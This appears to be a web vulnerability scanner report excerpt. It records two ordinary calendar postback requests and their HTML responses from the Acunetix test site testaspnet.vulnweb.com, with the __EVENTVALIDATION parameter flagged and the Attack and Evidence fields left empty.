Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8436&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBAr%2BwLB9sIZGRkvFqfd4Zxhsbx%2FDXOmE9R%2FmTcDIk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKn6IcXAtCnkuUEAtOn6sAIAo33qKkGAo33qKkGAuadu94JAuadu94JAuadr%2FUCAuadr%2FUCAuadw4kKAuadw4kKAuad96wDAuad96wDAuad68MMAuad68MMAuadn%2BYFAuadn%2BYFAuads70NAuads70NAuadp9AGAuadp9AGAuadm7kDAuadm7kDAuadj9wMAuadj9wMAvukmcUPAvukmcUPAvukjZgHAvukjZgHAvukoT8C%2B6ShPwL7pNXTCQL7pNXTCQL7pMn2AgL7pMn2AgL7pP2NCgL7pP2NCgL7pJGgAwL7pJGgAwL7pIXHDAL7pIXHDAL7pPmsCQL7pPmsCQL7pO3DAgL7pO3DAgLcy%2F%2FoBQLcy%2F%2FoBQLcy5OPDQLcy5OPDQLcy4eiBgLcy4eiBgLcy7v5DwLcy7v5DwLcy6%2BcBwLcy6%2BcBwLcy8MwAtzLwzAC3Mv31wkC3Mv31wkC3Mvr6gIC3Mvr6gIC3Mvf0w8C3Mvf0w8C3Mvz9ggC3Mvz9ggCsdLdnwoCsdLdnwoCsdLxsgMCsdLxsgMCsdLlyQwCsdLlyQwCsdKZ7AUCsdKZ7AUCsdKNgw0CsdKNgw0CsdKhpgYCsdKhpgYCsdLV%2Bg8CsdLV%2Bg8CsdLJkQcCsdLJkQcCsdK9%2BQUCsdK9%2BQUCsdLRnQ0CsdLRnQ0CivmjBQKK%2BaMF9dW8cZAoyj%2Ff1%2BnuqvTyfJ37FhA%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:38 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBAr+wLB9sIZGRkvFqfd4Zxhsbx/DXOmE9R/mTcDIk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKn6IcXAtCnkuUEAtOn6sAIAo33qKkGAo33qKkGAuadu94JAuadu94JAuadr/UCAuadr/UCAuadw4kKAuadw4kKAuad96wDAuad96wDAuad68MMAuad68MMAuadn+YFAuadn+YFAuads70NAuads70NAuadp9AGAuadp9AGAuadm7kDAuadm7kDAuadj9wMAuadj9wMAvukmcUPAvukmcUPAvukjZgHAvukjZgHAvukoT8C+6ShPwL7pNXTCQL7pNXTCQL7pMn2AgL7pMn2AgL7pP2NCgL7pP2NCgL7pJGgAwL7pJGgAwL7pIXHDAL7pIXHDAL7pPmsCQL7pPmsCQL7pO3DAgL7pO3DAgLcy//oBQLcy//oBQLcy5OPDQLcy5OPDQLcy4eiBgLcy4eiBgLcy7v5DwLcy7v5DwLcy6+cBwLcy6+cBwLcy8MwAtzLwzAC3Mv31wkC3Mv31wkC3Mvr6gIC3Mvr6gIC3Mvf0w8C3Mvf0w8C3Mvz9ggC3Mvz9ggCsdLdnwoCsdLdnwoCsdLxsgMCsdLxsgMCsdLlyQwCsdLlyQwCsdKZ7AUCsdKZ7AUCsdKNgw0CsdKNgw0CsdKhpgYCsdKhpgYCsdLV+g8CsdLV+g8CsdLJkQcCsdLJkQcCsdK9+QUCsdK9+QUCsdLRnQ0CsdLRnQ0CivmjBQKK+aMF9dW8cZAoyj/f1+nuqvTyfJ37FhA=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:White" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8201&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAnP1hTtoIZGRkZZUxCRONjHocGnbEGcEFNMQg4SI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKNoo%2BCDgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9scdFA9c3QUMguSaPOnbB%2FPuLdxw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:57 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAnP1hTtoIZGRkZZUxCRONjHocGnbEGcEFNMQg4SI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKNoo+CDgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9scdFA9c3QUMguSaPOnbB/PuLdxw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:White" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
